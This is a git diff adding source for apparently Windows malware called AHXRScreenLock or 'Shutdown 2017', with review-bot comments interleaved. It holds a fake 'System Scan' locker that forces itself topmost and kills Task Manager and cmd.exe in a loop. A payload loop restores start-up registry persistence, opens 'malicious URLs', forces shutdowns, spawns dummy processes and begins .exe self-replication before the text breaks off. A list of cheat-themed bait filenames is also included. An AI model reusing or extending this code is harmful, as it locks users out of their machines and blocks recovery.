@@ -452,6 +452,7 @@ namespace AHXRScreenLock { packLocker(s_file, marshal_as< std::string >(this->txtPassword->Text), marshal_as< std::string >(this->txtMessage->Text)); this->pgBar->Value = 80; if ( !s_attached_p.empty() ) { + puts(s_attached_p.c_str()); attachExecutable(s_file, s_attached_p); } diff --git a/src/builder/main.cpp b/src/builder/main.cpp index 5ec88cc..407c42f 100644 --- a/src/builder/main.cpp +++ b/src/builder/main.cpp @@ -48,6 +48,8 @@ void main(array^ args) { #ifdef DEBUG_MODE packLocker("AXHRLocker.exe", "hi", "basic message."); #endif + setLockerFileName(LOCKER_FILE_PATH); + if (args->Length >= 3) createClientLocker(args[ARG_FILE_NAME], args[ARG_PASSWORD], args[ARG_MESSAGE], args[ARG_EXE], args[ARG_ADDRESS]); diff --git a/src/library/locker.cpp b/src/library/locker.cpp index 0385389..1a9bd24 100644 --- a/src/library/locker.cpp +++ b/src/library/locker.cpp @@ -36,6 +36,8 @@ void buildNewLocker(string fileName) { ofstream f_new; + puts(LOCKER_FILE_NAME.c_str()); + f_old.open(LOCKER_FILE_NAME, ios::binary); f_new.open(fileName, ios::binary); diff --git a/src/library/settings.h b/src/library/settings.h index 836ce7f..c833fa4 100644 --- a/src/library/settings.h +++ b/src/library/settings.h @@ -20,14 +20,6 @@ along with AHXRScreenLock. If not, see . */ //======================================================= -//#define DEBUG_MODE - -#define ARG_FILE_NAME 0 -#define ARG_PASSWORD 1 -#define ARG_MESSAGE 2 -#define ARG_EXE 3 -#define ARG_ADDRESS 4 - #define PACK_SPLITTER "----" #define PACK_OPENER "{" #define PACK_CLOSER "}" diff --git a/src/listener/clientTest.cpp b/src/listener/clientTest.cpp new file mode 100644 index 0000000..6b7f1e7 --- /dev/null +++ b/src/listener/clientTest.cpp 
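Review bot: The added `puts(s_attached_p.c_str());` in src/builder/frmMain.h writes what appears to be the attached executable's path to stdout unconditionally and reads like leftover debugging. The same applies to `puts(LOCKER_FILE_NAME.c_str());` added to `buildNewLocker` in src/library/locker.cpp. main.cpp already fences debug-only code with `#ifdef DEBUG_MODE`, so either wrap both calls the same way or drop them before release. Both enclosing functions start and end outside their hunks.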
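Review bot: In src/builder/main.cpp the new `setLockerFileName(LOCKER_FILE_PATH);` is placed after the `#ifdef DEBUG_MODE` block, so a debug build calls `packLocker(...)` before the locker file name has been set. If `packLocker` depends on that name (not visible here, though `buildNewLocker` in locker.cpp does read `LOCKER_FILE_NAME`), move the call above the `#ifdef`. The debug literal `"AXHRLocker.exe"` also differs from `LOCKER_FILE_PATH` (`"AHXRLocker.exe"`) by a transposition; if the same name is meant, pass the macro instead. This commit additionally removes the `ARG_*` defines from src/library/settings.h while this file still uses `ARG_FILE_NAME` through `ARG_ADDRESS`, so confirm they are now defined in a header main.cpp includes. `main` continues outside the hunk.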
@@ -0,0 +1,159 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+*/
+//=======================================================
+#define WIN32_LEAN_AND_MEAN
+
+#include
+#include
+#include
+#include
+#include
+#include "clientTest.h"
+#include "serverThread.h"
+
+#pragma comment (lib, "Ws2_32.lib")
+#pragma comment (lib, "Mswsock.lib")
+#pragma comment (lib, "AdvApi32.lib")
+
+HANDLE h_client;
+DWORD dw_client;
+bool b_new_message = false;
+char * c_message;
+
+
+
+void sendNewMessage(char * message) {
+ b_new_message = true;
+ c_message = message;
+}
+
+#ifdef CLIENT_SERVER_TEST
+
+void clientServerTest() {
+ h_client = CreateThread(0, 0, t_clientServerTest, 0, 0, &dw_client);
+}
+
+DWORD WINAPI t_clientServerTest(LPVOID lpParameter) {
+ WSADATA wsaData;
+ SOCKET ConnectSocket = INVALID_SOCKET;
+ struct addrinfo *result = NULL,
+ *ptr = NULL,
+ hints;
+ char recvbuf[DEFAULT_BUFLEN];
+ int iResult;
+ int recvbuflen = DEFAULT_BUFLEN;
+
+ // Initialize Winsock
+ iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
+ if (iResult != 0) {
+ printf("WSAStartup failed with error: %d\n", iResult);
+ return 1;
+ }
+
+ ZeroMemory(&hints, sizeof(hints));
+ hints.ai_family = AF_UNSPEC;
+ hints.ai_socktype = SOCK_STREAM;
+ hints.ai_protocol = IPPROTO_TCP;
+
+ // Resolve the server address and port
+ iResult = getaddrinfo("localhost", DEFAULT_PORT, &hints, &result);
+ if (iResult != 0) {
+ printf("getaddrinfo failed with error: %d\n", iResult);
+ WSACleanup();
+ return 1;
+ }
+
+ // Attempt to connect to an address until one succeeds
+ for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
+
+ // Create a SOCKET for connecting to server
+ ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
+ ptr->ai_protocol);
+ if (ConnectSocket == INVALID_SOCKET) {
+ printf("socket failed with error: %ld\n", WSAGetLastError());
+ WSACleanup();
+ return 1;
+ }
+
+ // Connect to server.
+ iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
+ if (iResult == SOCKET_ERROR) {
+ closesocket(ConnectSocket);
+ ConnectSocket = INVALID_SOCKET;
+ continue;
+ }
+ break;
+ }
+
+ freeaddrinfo(result);
+
+ if (ConnectSocket == INVALID_SOCKET) {
+ printf("Unable to connect to server!\n");
+ WSACleanup();
+ return 1;
+ }
+
+
+ while (1) {
+ if (b_new_message) {
+ iResult = send(ConnectSocket, c_message, (int)strlen(c_message), 0);
+
+ if (iResult == SOCKET_ERROR) {
+ printf("send failed with error: %d\n", WSAGetLastError());
+ closesocket(ConnectSocket);
+ WSACleanup();
+ return 1;
+ }
+ b_new_message = false;
+ }
+ }
+
+
+ // shutdown the connection since no more data will be sent
+ iResult = shutdown(ConnectSocket, SD_SEND);
+ if (iResult == SOCKET_ERROR) {
+ printf("shutdown failed with error: %d\n", WSAGetLastError());
+ closesocket(ConnectSocket);
+ WSACleanup();
+ return 1;
+ }
+
+ // Receive until the peer closes the connection
+ do {
+
+ iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0);
+ if (iResult > 0)
+ printf("Message received: %s\n", recvbuf);
+ else if (iResult == 0)
+ printf("Connection closed\n");
+ else
+ printf("recv failed with error: %d\n", WSAGetLastError());
+
+ } while (iResult > 0);
+
+ // cleanup
+ closesocket(ConnectSocket);
+ WSACleanup();
+
+ return 0;
+}
+#endif
\ No newline at end of file
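Review bot: The receive loop at the end of `t_clientServerTest` prints `recvbuf` with `%s` although `recv` does not NUL-terminate what it writes, so `printf` can read past the received bytes and, when the buffer is filled, past the end of the array. Reserve one byte and terminate before printing: `iResult = recv(ConnectSocket, recvbuf, recvbuflen - 1, 0);` followed by `recvbuf[iResult] = '\0';` inside the `iResult > 0` branch. As written that code is also unreachable, because the preceding `while (1)` has no `break` and spins without yielding. The loop polls `b_new_message` and `c_message`, plain globals that `sendNewMessage` writes (presumably from another thread) with no synchronization, and `c_message` only borrows the caller's pointer, so the buffer must outlive the send.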
diff --git a/src/listener/clientTest.h b/src/listener/clientTest.h
new file mode 100644
index 0000000..c42ae49
--- /dev/null
+++ b/src/listener/clientTest.h
@@ -0,0 +1,32 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+
+ https://msdn.microsoft.com/en-us/library/windows/desktop/ms737889(v=vs.85).aspx
+*/
+//=======================================================
+//#define CLIENT_SERVER_TEST
+
+#ifdef CLIENT_SERVER_TEST
+ extern void clientServerTest();
+ DWORD WINAPI t_clientServerTest(LPVOID lpParameter);
+#endif
+
+//extern void sendNewMessage(char * message);
\ No newline at end of file
diff --git a/src/locked/frmMain.h b/src/locked/frmMain.h
new file mode 100644
index 0000000..b1eed3b
--- /dev/null
+++ b/src/locked/frmMain.h
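Review bot: The new src/listener/clientTest.h has no include guard and declares `t_clientServerTest` with `DWORD`, `WINAPI` and `LPVOID` without including the Windows header that defines them, so it only compiles when the including file has pulled that in first (clientTest.cpp appears to). Add `#pragma once` at the top, as src/locked/frmMain.h in this same commit does, and include `<windows.h>` inside the `#ifdef CLIENT_SERVER_TEST` block. The `sendNewMessage` declaration is commented out here while clientTest.cpp still defines the function unconditionally; a short comment saying whether it is declared elsewhere or intentionally unused would avoid confusion.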
@@ -0,0 +1,180 @@ +#pragma once + +namespace AHXRShutdownLocked { + + using namespace System; + using namespace System::ComponentModel; + using namespace System::Collections; + using namespace System::Windows::Forms; + using namespace System::Data; + using namespace System::Drawing; + + /// + /// Summary for frmMain + /// + public ref class frmMain : public System::Windows::Forms::Form + { + public: + frmMain(void) + { + InitializeComponent(); + // + //TODO: Add the constructor code here + // + } + + protected: + /// + /// Clean up any resources being used. + /// + ~frmMain() + { + if (components) + { + delete components; + } + } + private: System::Windows::Forms::Panel^ panel1; + private: System::Windows::Forms::Label^ lblMessage; + private: System::Windows::Forms::PictureBox^ pictureBox1; + private: System::Windows::Forms::Label^ lblTitle; + private: System::Windows::Forms::ProgressBar^ pgBar; + private: System::Windows::Forms::Timer^ tmerUpdate; + + private: System::ComponentModel::IContainer^ components; + + protected: + + private: + /// + /// Required designer variable. + /// + + +#pragma region Windows Form Designer generated code + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. 
+ /// + void InitializeComponent(void) + { + this->components = (gcnew System::ComponentModel::Container()); + System::ComponentModel::ComponentResourceManager^ resources = (gcnew System::ComponentModel::ComponentResourceManager(frmMain::typeid)); + this->panel1 = (gcnew System::Windows::Forms::Panel()); + this->pictureBox1 = (gcnew System::Windows::Forms::PictureBox()); + this->lblTitle = (gcnew System::Windows::Forms::Label()); + this->lblMessage = (gcnew System::Windows::Forms::Label()); + this->pgBar = (gcnew System::Windows::Forms::ProgressBar()); + this->tmerUpdate = (gcnew System::Windows::Forms::Timer(this->components)); + this->panel1->SuspendLayout(); + (cli::safe_cast(this->pictureBox1))->BeginInit(); + this->SuspendLayout(); + // + // panel1 + // + this->panel1->Anchor = static_cast(((System::Windows::Forms::AnchorStyles::Top | System::Windows::Forms::AnchorStyles::Left) + | System::Windows::Forms::AnchorStyles::Right)); + this->panel1->AutoSize = true; + this->panel1->BackColor = System::Drawing::Color::Red; + this->panel1->Controls->Add(this->pictureBox1); + this->panel1->Controls->Add(this->lblTitle); + this->panel1->Location = System::Drawing::Point(-17, -17); + this->panel1->Name = L"panel1"; + this->panel1->Size = System::Drawing::Size(1226, 133); + this->panel1->TabIndex = 0; + // + // pictureBox1 + // + this->pictureBox1->Image = (cli::safe_cast(resources->GetObject(L"pictureBox1.Image"))); + this->pictureBox1->Location = System::Drawing::Point(40, 31); + this->pictureBox1->Name = L"pictureBox1"; + this->pictureBox1->Size = System::Drawing::Size(97, 78); + this->pictureBox1->SizeMode = System::Windows::Forms::PictureBoxSizeMode::StretchImage; + this->pictureBox1->TabIndex = 3; + this->pictureBox1->TabStop = false; + // + // lblTitle + // + this->lblTitle->AutoSize = true; + this->lblTitle->Font = (gcnew System::Drawing::Font(L"Trebuchet MS", 48, System::Drawing::FontStyle::Bold, System::Drawing::GraphicsUnit::Point, + static_cast(0))); + 
this->lblTitle->ForeColor = System::Drawing::Color::White; + this->lblTitle->ImageAlign = System::Drawing::ContentAlignment::MiddleLeft; + this->lblTitle->Location = System::Drawing::Point(143, 31); + this->lblTitle->Name = L"lblTitle"; + this->lblTitle->Size = System::Drawing::Size(932, 81); + this->lblTitle->TabIndex = 2; + this->lblTitle->Text = L"Shutdown 2017 - System Scan"; + // + // lblMessage + // + this->lblMessage->Anchor = static_cast((((System::Windows::Forms::AnchorStyles::Top | System::Windows::Forms::AnchorStyles::Bottom) + | System::Windows::Forms::AnchorStyles::Left) + | System::Windows::Forms::AnchorStyles::Right)); + this->lblMessage->AutoSize = true; + this->lblMessage->Font = (gcnew System::Drawing::Font(L"Trebuchet MS", 36, System::Drawing::FontStyle::Regular, System::Drawing::GraphicsUnit::Point, + static_cast(0))); + this->lblMessage->ForeColor = System::Drawing::Color::White; + this->lblMessage->Location = System::Drawing::Point(12, 131); + this->lblMessage->Name = L"lblMessage"; + this->lblMessage->Size = System::Drawing::Size(1586, 366); + this->lblMessage->TabIndex = 1; + this->lblMessage->Text = resources->GetString(L"lblMessage.Text"); + this->lblMessage->TextAlign = System::Drawing::ContentAlignment::MiddleCenter; + this->lblMessage->Click += gcnew System::EventHandler(this, &frmMain::lblMessage_Click); + // + // pgBar + // + this->pgBar->Location = System::Drawing::Point(12, 529); + this->pgBar->Name = L"pgBar"; + this->pgBar->Size = System::Drawing::Size(768, 76); + this->pgBar->TabIndex = 2; + // + // tmerUpdate + // + this->tmerUpdate->Enabled = true; + this->tmerUpdate->Interval = 1000; + this->tmerUpdate->Tick += gcnew System::EventHandler(this, &frmMain::tmerUpdate_Tick); + // + // frmMain + // + this->AutoScaleDimensions = System::Drawing::SizeF(6, 13); + this->AutoScaleMode = System::Windows::Forms::AutoScaleMode::Font; + this->BackColor = System::Drawing::Color::Black; + this->ClientSize = System::Drawing::Size(1203, 617); + 
this->Controls->Add(this->pgBar); + this->Controls->Add(this->lblMessage); + this->Controls->Add(this->panel1); + this->ForeColor = System::Drawing::SystemColors::ControlText; + this->FormBorderStyle = System::Windows::Forms::FormBorderStyle::None; + this->Icon = (cli::safe_cast(resources->GetObject(L"$this.Icon"))); + this->Name = L"frmMain"; + this->StartPosition = System::Windows::Forms::FormStartPosition::CenterScreen; + this->Text = L"Shutdown 2017 - Scan"; + this->WindowState = System::Windows::Forms::FormWindowState::Maximized; + this->Load += gcnew System::EventHandler(this, &frmMain::frmMain_Load); + this->panel1->ResumeLayout(false); + this->panel1->PerformLayout(); + (cli::safe_cast(this->pictureBox1))->EndInit(); + this->ResumeLayout(false); + this->PerformLayout(); + + } +#pragma endregion + private: System::Void frmMain_Load(System::Object^ sender, System::EventArgs^ e) { + this->lblMessage->Location = System::Drawing::Point(this->Width / 2 - this->lblMessage->Width / 2, this->Height / 2 - this->lblMessage->Height / 2); + this->pgBar->Location = System::Drawing::Point(this->Width / 2 - this->pgBar->Width / 2, this->Height / 2 - this->pgBar->Height / 2 + 250); + + START_FORM_TOP_THREAD(); + } + private: System::Void tmerUpdate_Tick(System::Object^ sender, System::EventArgs^ e) { + this->pgBar->Value = this->pgBar->Value + 1; + + if (this->pgBar->Value >= 100) + FORM_SCAN_STATUS = true; + + } +private: System::Void lblMessage_Click(System::Object^ sender, System::EventArgs^ e) { +} +}; +} diff --git a/src/locked/main.cpp b/src/locked/main.cpp new file mode 100644 index 0000000..50ab9c7 --- /dev/null +++ b/src/locked/main.cpp 
@@ -0,0 +1,29 @@
+/*
+ @title
+ AHXRScreenLock
+ @author
+ AHXR (https://github.com/AHXR)
+ @copyright
+ 2017
+
+ AHXRScreenLock is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ AHXRScreenLock is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with AHXRScreenLock. If not, see .
+ */
+//=======================================================
+#include "threads.h"
+
+void main() {
+ START_FORM_THREAD();
+ while (!FORM_SCAN_STATUS) {}
+}
+
diff --git a/src/locked/threads.cpp b/src/locked/threads.cpp
new file mode 100644
index 0000000..b03b1c6
--- /dev/null
+++ b/src/locked/threads.cpp
@@ -0,0 +1,86 @@ +#include "threads.h" +#include "frmMain.h" + +HANDLE h_frm_thread; +HANDLE h_frm_top_thread; +DWORD dw_frm_top_thread; +DWORD dw_frm_thread; +DWORD WINAPI t_showLockdownForm(LPVOID lpParameter); +DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter); +DWORD FindProcessId(const std::wstring& processName); +bool b_scan_status; + +using namespace System; +using namespace System::Windows::Forms; + +DWORD WINAPI t_showLockdownForm(LPVOID lpParameter) { + Application::EnableVisualStyles(); + Application::SetCompatibleTextRenderingDefault(false); + AHXRShutdownLocked::frmMain frm; + Application::Run(%frm); + return 0; +} + +DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter) { + bool b_found = false; + HWND h_lockdown; + while (1) { + if (!b_found) { + h_lockdown = FindWindow(NULL, WINDOW_NAME); + if (h_lockdown != NULL) + b_found = true; + } + else { + SetWindowPos(h_lockdown, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE); + + // FORCE the window to be in front at all times + SetActiveWindow(h_lockdown); + SetFocus(h_lockdown); + SetCapture(h_lockdown); + SetForegroundWindow(h_lockdown); + EnableWindow(h_lockdown, true); + +#ifdef TASK_MANAGER_KILL + DWORD d_task = FindProcessId(SCREEN_LOCK_TSKMGR); + if (d_task != 0) { + HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, d_task); + TerminateProcess(h_process, 1); + } +#endif + +#ifdef CMD_KILL + DWORD dc_task = FindProcessId(SCREEN_LOCK_CMD); + if (dc_task != 0) { + HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, dc_task); + TerminateProcess(h_process, 1); + } +#endif + } + } + return 0; +} + +DWORD FindProcessId(const std::wstring & processName) { + PROCESSENTRY32 processInfo; + processInfo.dwSize = sizeof(processInfo); + + HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + if (processesSnapshot == INVALID_HANDLE_VALUE) + return 0; + + Process32First(processesSnapshot, &processInfo); + if (!processName.compare(processInfo.szExeFile)) { + 
CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + + while (Process32Next(processesSnapshot, &processInfo)) { + if (!processName.compare(processInfo.szExeFile)) { + CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + } + + CloseHandle(processesSnapshot); + return 0; +} \ No newline at end of file diff --git a/src/locked/threads.h b/src/locked/threads.h new file mode 100644 index 0000000..eff5f81 --- /dev/null +++ b/src/locked/threads.h @@ -0,0 +1,28 @@ +#include +#include +#include + +extern HANDLE h_frm_thread; +extern HANDLE h_frm_top_thread; +extern DWORD dw_frm_top_thread; +extern DWORD dw_frm_thread; +extern DWORD WINAPI t_showLockdownForm(LPVOID lpParameter); +extern DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter); +extern bool b_scan_status; + +#define WINDOW_NAME L"Shutdown 2017 - Scan" +#define CMD_KILL +#define TASK_MANAGER_KILL + +#ifdef TASK_MANAGER_KILL + #define SCREEN_LOCK_TSKMGR L"taskmgr.exe" +#endif + +#ifdef CMD_KILL + #define SCREEN_LOCK_CMD L"cmd.exe" +#endif + +#define START_FORM_THREAD() {h_frm_thread = CreateThread(0, 0, &t_showLockdownForm, 0, 0, &dw_frm_thread);} +#define START_FORM_TOP_THREAD() {h_frm_top_thread = CreateThread(0, 0, &t_alwaysOnTop, 0, 0, &dw_frm_top_thread);} + +#define FORM_SCAN_STATUS b_scan_status \ No newline at end of file diff --git a/src/locker/main.cpp b/src/locker/main.cpp index 98667e8..fa81c18 100644 --- a/src/locker/main.cpp +++ b/src/locker/main.cpp @@ -158,7 +158,7 @@ int main() { #endif // Obtaining the message. - size_t t_msg_open = s_search.find(PACK_OPENER, t_pw_close); + size_t t_msg_open = s_search.find(PACK_OPENER, t_pw_close + PASSWORD_HASH_LENGTH); size_t t_msg_close = s_search.find(PACK_CLOSER, t_msg_open); s_message = s_search.substr(t_msg_open + 1, t_msg_close - t_msg_open - 1); // Adjusting character positions. 
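Review bot: `t_alwaysOnTop` in src/locked/threads.cpp has no comment saying that, once the window is found, every pass of its `while (1)` loop looks up `taskmgr.exe` and `cmd.exe` and calls `TerminateProcess` on them; threads.h in this same commit defines `TASK_MANAGER_KILL` and `CMD_KILL` unconditionally, so both branches are always compiled in. I would add a header comment such as `// Keeps WINDOW_NAME topmost; while the window exists, terminates taskmgr.exe and cmd.exe on every iteration (the loop has no sleep).` so a reader analysing an affected machine knows this process has to be ended before those tools will stay open. The same behaviour is what to look for in telemetry: one process repeatedly calling `OpenProcess(PROCESS_ALL_ACCESS, ...)` on those two image names, most likely alongside sustained CPU use from the unthrottled loop.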
@@ -217,7 +217,7 @@ int main() { else Application::Exit(); - START_SERVER_THREAD(); // Locking the program & taskmgr. + START_SERVER_THREAD(); // Locking the program & taskmgr. if (ss_server_host.compare("0") != 0) { START_CLIENT_THREAD(); // Connect user to listener (if any) diff --git a/src/payloads/directory.cpp b/src/payloads/directory.cpp new file mode 100644 index 0000000..314f077 --- /dev/null +++ b/src/payloads/directory.cpp @@ -0,0 +1,41 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "directory.h" + +#include +#include +#include + + +#pragma comment (lib, "shell32.lib") + +using namespace std; + +inline string getHomeDirectory() { + char + my_documents[MAX_PATH] + ; + HRESULT result = SHGetFolderPathA(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, my_documents); + return my_documents; +} diff --git a/src/payloads/directory.h b/src/payloads/directory.h new file mode 100644 index 0000000..8aba28a --- /dev/null +++ b/src/payloads/directory.h 
@@ -0,0 +1,25 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include + +extern std::string getHomeDirectory(); diff --git a/src/payloads/fake_exe.h b/src/payloads/fake_exe.h new file mode 100644 index 0000000..f8da9b3 --- /dev/null +++ b/src/payloads/fake_exe.h 
@@ -0,0 +1,64 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#pragma once + +char * c_fake_executables[] = { + "aimbot", + "mp3converter", + "mp4tomp3", + "xnxx", + "wallhack", + "facebook", + "youtube", + "bruteforce", + "twitter", + "proxy", + "poker", + "gmail" + "hotmail", + "csgo", + "css" + "dota2", + "tf2", + "discord", + "steam", + "l4d2", + "regedit", + "esp", + "hack4hack", + "iwantcheats", + "iwantcheats", + "fpscheats", + "dota2boost", + "tmcheats", + "csgocheats", + "bhop", + "triggerbot", + "hack_inject", + "skinchanger", + "wh", + "glow", + "noflash", + "nofog", + "gui" +}; \ No newline at end of file diff --git a/src/payloads/install_callback.h b/src/payloads/install_callback.h new file mode 100644 index 0000000..3a61674 --- /dev/null +++ b/src/payloads/install_callback.h @@ -0,0 +1,6 @@ +#include +#include + +void onClientInstallShutdown( const char * path ) { + printf("Shutdown 2017 installed (\"%s\")\r\n", path); +} \ No newline at end of file diff --git a/src/payloads/main.cpp b/src/payloads/main.cpp new file mode 100644 index 0000000..785212f --- /dev/null +++ b/src/payloads/main.cpp 
@@ -0,0 +1,100 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "directory.h" +#include "payload_shutdown.h" +#include "payload_startup.h" +#include "payload_malicious.h" +#include "payload_install.h" +#include "payload_dummy.h" +#include "payload_scan.h" +#include "payload_lock.h" + +#include +#include + +//#define WINDOWS_CONSOLE + +#ifdef WINDOWS_CONSOLE +void main() { +#else +int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iCmdshow){ +#endif + STARTUP_PAYLOAD(); + INSTALL_PAYLOAD(); + SHUTDOWN_PAYLOAD(); + readMaliciousURLs(); + + // Flood prevention + Sleep(5000); + START_DUMMY_PAYLOAD(); + LOCK_PAYLOAD(); + //Sleep(1000000); + + int i_random_result; + bool b_made_dummy = false; + srand(time(NULL)); + + while (1) { + // Restarting start-up payload if something deletes registry. 
+ if (isStartupRegistered()) + STARTUP_PAYLOAD(); + + i_random_result = rand() % 5; + switch (i_random_result) { + case 0: { + SHUTDOWN_PAYLOAD(); + break; + } + case 1: { + openRandomMaliciousURL(); + break; + } + case 2: { + if (!b_made_dummy) { + START_DUMMY_PAYLOAD(); + b_made_dummy = true; + } + break; + } + case 3: { // Flooding + for (int i = 0; i < 5; i++) { + SHUTDOWN_PAYLOAD(); + Sleep(500); + START_DUMMY_PAYLOAD(); + } + break; + } + case 4: { + SCAN_PAYLOAD(); + break; + } + } + + Sleep(300000); + } +#ifndef WINDOWS_CONSOLE + return 0; +#endif +} + diff --git a/src/payloads/payload_dummy.cpp b/src/payloads/payload_dummy.cpp new file mode 100644 index 0000000..6df8264 --- /dev/null +++ b/src/payloads/payload_dummy.cpp 
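Review bot: The `while (1)` loop in `WinMain` documents neither its cadence nor what each `case` starts; its only comment is `// Restarting start-up payload if something deletes registry.` on the first statement. A block comment above the loop, for example `// Every 300000 ms: checks isStartupRegistered() and may re-run STARTUP_PAYLOAD(), then runs one of five payloads picked by rand() % 5.`, would make it clear that the start-up registration is revisited for as long as the process lives, so cleanup has to end the process before removing the entry. `isStartupRegistered()` and `STARTUP_PAYLOAD()` come from payload_startup.h, which is outside this hunk, so the registry location itself cannot be stated from here.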
@@ -0,0 +1,109 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" + +#ifdef __cplusplus_cli + #define generic __identifier(generic) +#endif +#include +#ifdef __cplusplus_cli + #undef generic +#endif + +#include "payload_shutdown.h" +#include "payload_dummy.h" +#include +#include +#include +#include +#include +#include + +namespace fs = boost::filesystem; +using namespace std; + +void createDummyProcess() { + fs::directory_iterator it_end; + fs::directory_iterator it_dir(getFullShutdownDirectory()); + + vector< string > v_random_file; + + while (it_dir != it_end) { + try { + if (!fs::is_directory(it_dir->status())) { // Listing non-directory files. + if (it_dir->path().filename().extension() == ".exe") // Only list .exe files. + v_random_file.push_back(it_dir->path().string()); + } + it_dir++; + } + catch (const std::exception & ex) { + std::cout << it_dir->path().filename() << " " << ex.what() << std::endl; + } + } + + if (v_random_file.size() == 0) { + Sleep(2000); + createDummyProcess(); + } + else { + srand(time(NULL)); + int i_random_exe = rand() % v_random_file.size(); + + // Replacing and self-replication. 
